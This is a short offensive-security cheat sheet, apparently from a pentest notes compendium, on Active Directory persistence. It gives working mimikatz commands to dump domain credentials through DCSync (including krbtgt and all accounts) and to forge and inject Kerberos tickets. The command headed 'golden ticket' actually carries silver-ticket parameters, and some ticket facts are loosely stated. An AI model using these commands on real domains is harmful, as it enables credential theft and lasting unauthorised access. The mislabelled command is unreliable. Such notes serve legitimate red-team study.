killchain-compendium/misc/active_directory/ad_persistence.md

# Active Directory Persistance


## Using Credentials

* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest 
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
    * Credentials for multiple local administrators
    * Service account with delegation permissions
    * __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)

### Usage

* Use mimikatz
```sh
lsadump::dcsync /domain:<domain> /user:<username>
```
* To query the krbtgt user
```sh
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
```
* Query everything
```sh
lsadump::dcsync /domain:<domain> /all
```

## Using Tickets

* __Golden Ticket__ crafted TGT, 
    * Needs domain name, domain SID and a user ID to impersonate
    * Needs krbtgt NTLM to sign the ticket
    * krbtgt hash never rotates automatically, only refreshed manually
    * krbtgt hash bypasses smart cards
    * TGT can not be older than 20 minutes
    * TGT lifetime can be set to years
    * TGT can be signed anywhere as long as the krbtgt hash is known

* __Silver Ticket__ crafted TGS
    * Signed by targeted service account on a host
    * DC is never contacted, no contact to any TGT or KDC
    * Non existing user can be used with a local admin group's SID

### Usage 

* Craft a golden ticket
```sh
Get-ADDomain
```
```sh
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```